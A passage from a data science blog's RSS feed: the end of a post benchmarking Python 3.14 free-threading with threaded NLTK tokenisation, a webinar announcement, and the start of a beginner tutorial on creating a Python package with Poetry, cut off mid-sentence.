&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PYTHON_GIL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; uv run python -m timeit &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --setup &lt;span style="color:#a5d6ff"&gt;&amp;#34;import main; corpus = main.setup()&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;main.tokenise_seq(corpus)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [lots of output messages]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 loop, best of 5: 53.1 sec per loop&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After some initial steps where the &lt;code&gt;nltk&lt;/code&gt; datasets were downloaded and the
&lt;code&gt;corpus&lt;/code&gt; object was created (neither of which was timed, because these
steps were part of the &lt;code&gt;timeit&lt;/code&gt; &lt;code&gt;--setup&lt;/code&gt; block), &lt;code&gt;tokenise_seq(corpus)&lt;/code&gt; was
run multiple times and the fastest run took around 53 seconds.&lt;/p&gt;
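&lt;p&gt;The same measurement pattern can be written in Python with &lt;code&gt;timeit.repeat()&lt;/code&gt;. This sketch times a cheap sorting statement instead of the tokeniser, purely so that it finishes quickly; the setup and statement strings are invented for the example:&lt;/p&gt;

```python
import timeit

# Setup runs before each repeat and is excluded from the measured time
setup_code = "data = list(range(100_000))"
statement = "sorted(data, reverse=True)"

# repeat=5, number=1 mirrors the "1 loop, best of 5" report on the command line
timings = timeit.repeat(stmt=statement, setup=setup_code, repeat=5, number=1)
best = min(timings)
print(f"best of {len(timings)}: {best:.4f} sec per loop")
```

&lt;p&gt;Taking the minimum rather than the mean is the usual convention, because slower runs tend to reflect interference from other processes rather than the code itself.&lt;/p&gt;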
&lt;p&gt;A small note: we have used the environment variable &lt;code&gt;PYTHON_GIL=0&lt;/code&gt; here.
This makes it explicit that we are using free-threading (turning off the
GIL). This wouldn’t normally be necessary to take advantage of
free-threading (in Python &amp;ldquo;3.14t&amp;rdquo;), but was needed because one of the
dependencies of &lt;code&gt;nltk&lt;/code&gt; hasn’t
been validated for the free-threaded build yet.&lt;/p&gt;
&lt;p&gt;To write a threaded-version of the same, we introduce two functions. The
first is a helper that takes (filename, document-content) pairs and
returns (filename, processed-document) pairs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tupled_tokeniser&lt;/span&gt;(pair):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    file_id, doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pair
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; file_id, tokenise_and_pos_tag(doc)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The second function creates a thread pool with as many worker threads as there are CPUs
on my machine (16, counted by &lt;code&gt;multiprocessing.cpu_count()&lt;/code&gt;). Each document is submitted to the pool as a
separate task, and we wait for all of the documents to be processed before returning results to the
caller:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;multiprocessing&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;mp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;concurrent.futures&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ThreadPoolExecutor, wait
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_threaded&lt;/span&gt;(corpus):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;mp&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cpu_count()) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; tpe:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            futures &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                tpe&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;submit(tupled_tokeniser, pair)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; pair &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            wait(futures)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;finally&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#8b949e;font-style:italic"&gt;# output is a list of (file-id, data) pairs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            tokens &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [f&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;result() &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; futures]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; tokens
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Time the `tokenise_threaded()` function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -- but do not time any setup code...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PYTHON_GIL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; uv run python -m timeit &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --setup &lt;span style="color:#a5d6ff"&gt;&amp;#34;import main; corpus = main.setup()&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;main.tokenise_threaded(corpus)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [lots of output messages]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 loop, best of 5: 32.5 sec per loop&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using the
&lt;a href="https://htop.dev/" rel="external"&gt;&lt;code&gt;htop&lt;/code&gt; tool&lt;/a&gt; on Ubuntu, I could see that every core was used when processing the documents. At points during the run, each of the 16 CPUs was
close to 100% utilisation (whereas only one or two CPUs were busy at any time during the sequential run):&lt;/p&gt;
&lt;p&gt;&lt;img
src="busy-processors.png"
alt="Visual demonstration that 16 processors were busy" /&gt;&lt;/p&gt;
&lt;p&gt;But, despite using 16x as many CPUs, the multithreaded version of the
processing script took only about 40% less time (32.5 seconds versus 53.1). There were only 18 books in
the dataset and some disparity between the book lengths (the Bible,
by far the longest text, was processed much more slowly than the others).
Maybe the speed-up would be greater with a larger or more balanced
dataset.&lt;/p&gt;
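&lt;p&gt;The arithmetic behind that comparison, and the effect of one oversized task, can be sketched as follows. The two timings are the ones reported in this post; the per-book durations in &lt;code&gt;book_times&lt;/code&gt; are invented purely to illustrate imbalance and are not measurements:&lt;/p&gt;

```python
sequential_s = 53.1  # best sequential time reported in this post
threaded_s = 32.5    # best threaded time reported in this post
n_cpus = 16

speedup = sequential_s / threaded_s
time_saved = 1 - threaded_s / sequential_s
efficiency = speedup / n_cpus

# Hypothetical per-book durations (seconds), invented to illustrate imbalance
book_times = [20.0, 6.0, 5.0, 4.0, 3.0, 3.0, 2.0, 2.0]
# A parallel run can never finish before its longest single task does
best_possible = max(sum(book_times) / n_cpus, max(book_times))

print(f"speed-up {speedup:.2f}x, time saved {time_saved:.0%}, efficiency {efficiency:.0%}")
print(f"lower bound on parallel run time: {best_possible:.1f} s")
```

&lt;p&gt;With one book dominating the workload, adding more workers stops helping once every other book has a worker of its own, which is one plausible reason for the modest gain here.&lt;/p&gt;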
&lt;p&gt;In the post on the WZB Data Science blog, there is a multiprocessing
implementation of the above. Running their multiprocessing code with 16
CPUs gave a similar speed up to multithreading (minimum time 31.2 seconds).
Indeed, if I were writing this code for a real project, multiprocessing would
remain my choice, because the analysis for one book can proceed independently of
that for any other book and data volumes aren&amp;rsquo;t that big.&lt;/p&gt;
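&lt;p&gt;One way to keep both options open is to write the parallel step against the shared &lt;code&gt;concurrent.futures&lt;/code&gt; executor interface. The sketch below is an illustration, not the WZB implementation: &lt;code&gt;count_words&lt;/code&gt; is a cheap stand-in for &lt;code&gt;tokenise_and_pos_tag()&lt;/code&gt;, and &lt;code&gt;process_corpus&lt;/code&gt; and its parameters are hypothetical names. It also returns a dictionary, like &lt;code&gt;tokenise_seq()&lt;/code&gt;:&lt;/p&gt;

```python
from concurrent.futures import ThreadPoolExecutor

def count_words(doc):
    """Cheap stand-in for tokenise_and_pos_tag(), so no downloads are needed."""
    return len(doc.split())

def process_corpus(corpus, func, executor_cls=ThreadPoolExecutor, max_workers=4):
    """Apply func to every document and return a dict keyed by file id."""
    with executor_cls(max_workers=max_workers) as pool:
        # Executor.map yields results in input order, so zip keeps keys aligned
        results = pool.map(func, corpus.values())
        return dict(zip(corpus.keys(), results))

toy_corpus = {
    "a.txt": "Emma Woodhouse, handsome, clever, and rich",
    "b.txt": "Call me Ishmael",
}
word_counts = process_corpus(toy_corpus, count_words)
print(word_counts)
```

&lt;p&gt;Passing &lt;code&gt;ProcessPoolExecutor&lt;/code&gt; as &lt;code&gt;executor_cls&lt;/code&gt; should switch this to multiprocessing, provided the function and documents can be pickled and the script is guarded with &lt;code&gt;if __name__ == "__main__":&lt;/code&gt;.&lt;/p&gt;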
&lt;h2 id="other-news"&gt;Other News&lt;/h2&gt;
&lt;p&gt;Python 3.14 has also introduced some improvements to exception-handling, a new approach to
string templating and improvements to the use of concurrent interpreters.
See the
&lt;a href="https://docs.python.org/3.14/whatsnew/3.14.html" rel="external"&gt;Python 3.14 release notes&lt;/a&gt; for further details.&lt;/p&gt;
&lt;p&gt;In the wider Python Data Science ecosystem, a few other developments have occurred or are due
before the end of 2025:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The first stable release of the
&lt;a href="https://posit.co/blog/positron-product-announcement-aug-2025" rel="external"&gt;Positron IDE&lt;/a&gt; was made in August;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html" rel="external"&gt;Pandas 3.0&lt;/a&gt; is due before the end of the
year, and will introduce strings as a data-type, copy-on-write behaviour, and implicit access to
columns in DataFrame-modification code;&lt;/li&gt;
&lt;li&gt;Tools that ingest DataFrames are becoming agnostic to DataFrame library through the Narwhals
project. See the
&lt;a href="https://plotly.com/blog/chart-smarter-not-harder-universal-dataframe-support/" rel="external"&gt;Plotly write-up&lt;/a&gt;
on this subject.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Python data science progresses at such a speed that we can only really scratch the surface here.
Have we missed anything in the wider Python ecosystem (2025 edition) that will make a huge
difference to your data work? Let us know on
&lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd" rel="external"&gt;LinkedIn&lt;/a&gt; or
&lt;a href="https://bsky.app/profile/jumpingrivers.com" rel="external"&gt;Bluesky&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-py314/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming Free Webinar: Understanding Posit - Ecosystem and Use Cases</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/</link><pubDate>Mon, 13 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Date:&lt;/strong&gt; Thursday, 23rd October 2025&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Time:&lt;/strong&gt; 13:05 (UK Time)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duration:&lt;/strong&gt; 55 minutes&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cost:&lt;/strong&gt; Absolutely free!&lt;/p&gt;
&lt;p&gt;Reserve your spot now: &lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs"&gt;https://jumpingrivers.typeform.com/to/UmdyNbAs&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ready to get more out of your Posit tools and understand how they can drive value
across your organisation? Join us for this month’s free Jumping Rivers webinar,
“Understanding Posit: Ecosystem and Use Cases.”
In this live session, our experts will take you beyond the basics -
exploring how Posit’s ecosystem (including Connect, Workbench, and Package Manager)
supports scalable, secure, and collaborative data workflows. Whether you’re managing
analytical environments, deploying Shiny apps, or looking to integrate R and Python
workflows across teams, this session will show you how to make the most of your Posit investment.&lt;/p&gt;
&lt;p&gt;What you’ll gain:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A clear understanding of how the Posit ecosystem fits into modern data infrastructure&lt;/li&gt;
&lt;li&gt;Guidance for managing and scaling data science environments&lt;/li&gt;
&lt;li&gt;A chance to ask questions directly to our experts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Exclusive attendee perks:
Attend &lt;strong&gt;two or more webinars&lt;/strong&gt; and receive &lt;strong&gt;a 30% discount&lt;/strong&gt; for our AI in Production
Conference (June 2026) — where data scientists, engineers, and innovators meet to
share ideas, network, and explore the future of AI.
👉 &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;Register for the conference here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners</title><link>https://www.jumpingrivers.com/blog/python-package/</link><pubDate>Thu, 09 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;In this blog series (this and the next blog) I am going to demonstrate how to use
&lt;a href="https://python-poetry.org/" rel="external"&gt;Poetry&lt;/a&gt; to create a Python package, set up testing infrastructure
and install it. I am going to be creating a wrapper around the Fantasy Premier League API
and creating a function which can create a weekly league table.&lt;/p&gt;
&lt;p&gt;Before we look at creating a package, why might we want one? There is a multitude of reasons for
wrapping your code up but to me the main three are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Code wrapped up in a package is &lt;strong&gt;reusable&lt;/strong&gt;, meaning we just need to install the package
to use the exported functions instead of copy-and-pasting or reimplementing the same code in your projects.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The code is very easy to &lt;strong&gt;share&lt;/strong&gt; once wrapped up in a package. Just publish to a package index
or share the repository privately and other people will be able to use it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Maintenance&lt;/strong&gt; of a package is also very easy with all the development tools available.
Centralisation of bug fixes, updates, documentation, testing and more will make your life a
whole lot easier.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We will come back to the value of distributing a package later in the blog series. When a publishable package is ready,
it can be published in the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index (PyPI)&lt;/a&gt; and from here
it can be installed by other users.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="set-up"&gt;Set Up&lt;/h2&gt;
&lt;p&gt;The first thing you&amp;rsquo;ll need to do is come up with a name for your package (often the hardest bit)
and then we will use Poetry to create the initial infrastructure. Note that other packaging and
dependency management tools are available like &lt;a href="https://pypi.org/project/setuptools/" rel="external"&gt;Setuptools&lt;/a&gt;,
&lt;a href="https://pypi.org/project/flit/" rel="external"&gt;Flit&lt;/a&gt; or &lt;a href="https://pypi.org/project/hatch/" rel="external"&gt;Hatch&lt;/a&gt;.
In this blog, though, we are focusing on Poetry, so once we have a name for the
package (mine is called &lt;code&gt;fpl-league&lt;/code&gt;) we can run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry new fpl-league
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will create a directory called &lt;code&gt;fpl-league&lt;/code&gt; with the structure:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;fpl-league
├── poetry.lock
├── pyproject.toml
├── README.md
├── src
│   └── fpl_league
│       ├── get_league.py
│       └── __init__.py
└── tests
    └── __init__.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The purpose of these files is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;pyproject.toml&lt;/code&gt; - The config file for your package, containing information
like name, version, author, license and any dependencies or build tools used.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;README.md&lt;/code&gt; - Not Python-specific, just a file containing an overview
of how to use / install the package and any other relevant information.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;src/&lt;/code&gt; - This directory will contain any of the actual source (src) code
of your package.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;tests/&lt;/code&gt; - Contains any code or data used for testing your package.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;__init__.py&lt;/code&gt; - This file marks a directory as a Python package and is used to control
what gets exported from your package. You&amp;rsquo;ll notice there is one of these in &lt;code&gt;tests/&lt;/code&gt;
and one under &lt;code&gt;src/&lt;/code&gt;. The use is similar in each: in &lt;code&gt;tests/&lt;/code&gt; it makes code importable
for testing, and under &lt;code&gt;src/&lt;/code&gt; it makes code importable for users of the package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note: Testing will be covered briefly in the next blog and we also have some other blogs on the
subject like &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;&amp;lsquo;First Steps in Python Testing&amp;rsquo;&lt;/a&gt;
and &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;&amp;lsquo;Advanced Testing in Python&amp;rsquo;.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Okay we&amp;rsquo;ve now got the skeleton of our package! Here is where we start fleshing things out. I
know that for my package I&amp;rsquo;m going to be querying an API with the &lt;a href="https://pypi.org/project/requests/" rel="external"&gt;requests&lt;/a&gt;
package. That means &lt;code&gt;requests&lt;/code&gt; should be a dependency of my package, and that anybody who wants to use my
package will also need requests installed.&lt;/p&gt;
&lt;p&gt;To add &lt;code&gt;requests&lt;/code&gt; as a dependency of my package we are again going to turn to Poetry and run &lt;code&gt;poetry add&lt;/code&gt; whilst at the
root level of the package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry add requests
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will update our &lt;code&gt;pyproject.toml&lt;/code&gt; to include requests as a dependency and create a new file called
&lt;code&gt;poetry.lock&lt;/code&gt; which contains all dependencies and sub-dependencies of our package with exact versions.
The &lt;code&gt;poetry.lock&lt;/code&gt; file is helpful for ensuring the code will work on any machine whilst developing the package.
Here is what the toml file will look like after adding requests:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[project]
name = &amp;#34;fpl-league&amp;#34;
version = &amp;#34;0.1.0&amp;#34;
description = &amp;#34;&amp;#34;
authors = [
{name = &amp;#34;osheen1&amp;#34;,email = &amp;#34;osheen@jumpingrivers.com&amp;#34;}
]
readme = &amp;#34;README.md&amp;#34;
requires-python = &amp;#34;&amp;gt;=3.10&amp;#34;
dependencies = [
&amp;#34;requests (&amp;gt;=2.32.5,&amp;lt;3.0.0)&amp;#34;
]
[tool.poetry]
packages = [{include = &amp;#34;fpl_league&amp;#34;, from = &amp;#34;src&amp;#34;}]
[build-system]
requires = [&amp;#34;poetry-core&amp;gt;=2.0.0,&amp;lt;3.0.0&amp;#34;]
build-backend = &amp;#34;poetry.core.masonry.api&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The change made here is the dependencies field has been updated to include &lt;code&gt;requests&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="python-environments"&gt;Python Environments&lt;/h2&gt;
&lt;p&gt;Python Environments could be a blog post by themselves, so I will only cover the background briefly and
why they are important for package development. If you want to learn more about what they are,
&lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/" rel="external"&gt;this Jumping Rivers blog&lt;/a&gt; comparing Python Environments and Barbie
is helpful, and if you want to know whether you should be using one,
&lt;a href="https://stackoverflow.com/questions/72835581/explain-why-python-virtual-environments-are-better" rel="external"&gt;this StackOverflow question&lt;/a&gt;
should tell you.&lt;/p&gt;
&lt;p&gt;A Python Environment or virtual environment (venv) is similar to any kind of environment in the data science world: it is a
box where you have exactly what you need installed for the specific project it&amp;rsquo;s associated with. During package development, using a venv helps keep the development environment reproducible across a team, as all developers will be using the
same package versions. As with everything in Python, there are multiple tools for setting up a
venv, like
&lt;a href="https://docs.python.org/3/library/venv.html" rel="external"&gt;venv&lt;/a&gt; or
&lt;a href="https://pipenv.pypa.io/en/latest/" rel="external"&gt;pipenv&lt;/a&gt;, but for this blog we are sticking with Poetry.&lt;/p&gt;
&lt;p&gt;To use a virtual environment while developing your package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry install
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will ensure all package dependencies are installed.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry env activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This prints the command needed to activate the venv: a &lt;code&gt;source&lt;/code&gt; call on the
venv&amp;rsquo;s activation file. Alternatively, you can run the following, which
evaluates the returned command in one step:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;eval $(poetry env activate)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Once you have activated the venv your terminal will display the name of that environment
in brackets like this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-package/venv.png" width="381"&gt;&lt;/p&gt;
&lt;p&gt;We can test the venv by checking that the installed packages match the &lt;code&gt;poetry.lock&lt;/code&gt;
file: enter a Python session and compare the package versions inside the venv with the system versions.
As I have only installed requests at this point:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-package/requests_version.png" width="780"&gt;&lt;/p&gt;
&lt;p&gt;Inside the venv I am using a version of requests that satisfies the dependency &amp;ldquo;requests (&amp;gt;=2.32.5,&amp;lt;3.0.0)&amp;rdquo;
defined in the &lt;code&gt;pyproject.toml&lt;/code&gt; and &lt;code&gt;poetry.lock&lt;/code&gt; files, rather than my system version,
which is &amp;ldquo;2.31.0&amp;rdquo;.&lt;/p&gt;
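&lt;p&gt;The same check can be scripted rather than read off a screenshot. The following is a minimal sketch using only the standard library; the helper names &lt;code&gt;in_virtualenv&lt;/code&gt; and &lt;code&gt;installed_version&lt;/code&gt; are made up for illustration and are not part of Poetry or of this package:&lt;/p&gt;

```python
import sys
from importlib.metadata import PackageNotFoundError, version


def in_virtualenv():
    """Return True when the interpreter is running inside a virtual environment."""
    # Inside a venv, sys.prefix points at the venv while sys.base_prefix
    # still points at the interpreter the venv was created from.
    return sys.prefix != sys.base_prefix


def installed_version(package):
    """Return the installed version of `package`, or None if it is not installed."""
    try:
        return version(package)
    except PackageNotFoundError:
        return None


print("Inside a venv:", in_virtualenv())
print("requests version:", installed_version("requests"))
```

&lt;p&gt;Running this once inside the venv and once outside should report different requests versions whenever the two installations differ.&lt;/p&gt;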
&lt;p&gt;Then to exit the venv you can use:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;deactivate
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="adding-a-function--intro-to-fpl"&gt;Adding a Function (&amp;amp; Intro to FPL)&lt;/h2&gt;
&lt;p&gt;Now we&amp;rsquo;ve learnt a bit about developing a Python package, the next thing to do is add the one and
only function I&amp;rsquo;ll be putting in this package: a wrapper around the Fantasy Premier
League API. If you don&amp;rsquo;t already know, Fantasy Premier League (FPL) is an online game where you and
other players each pick a team of real-life footballers and score points based on their actions in real-life
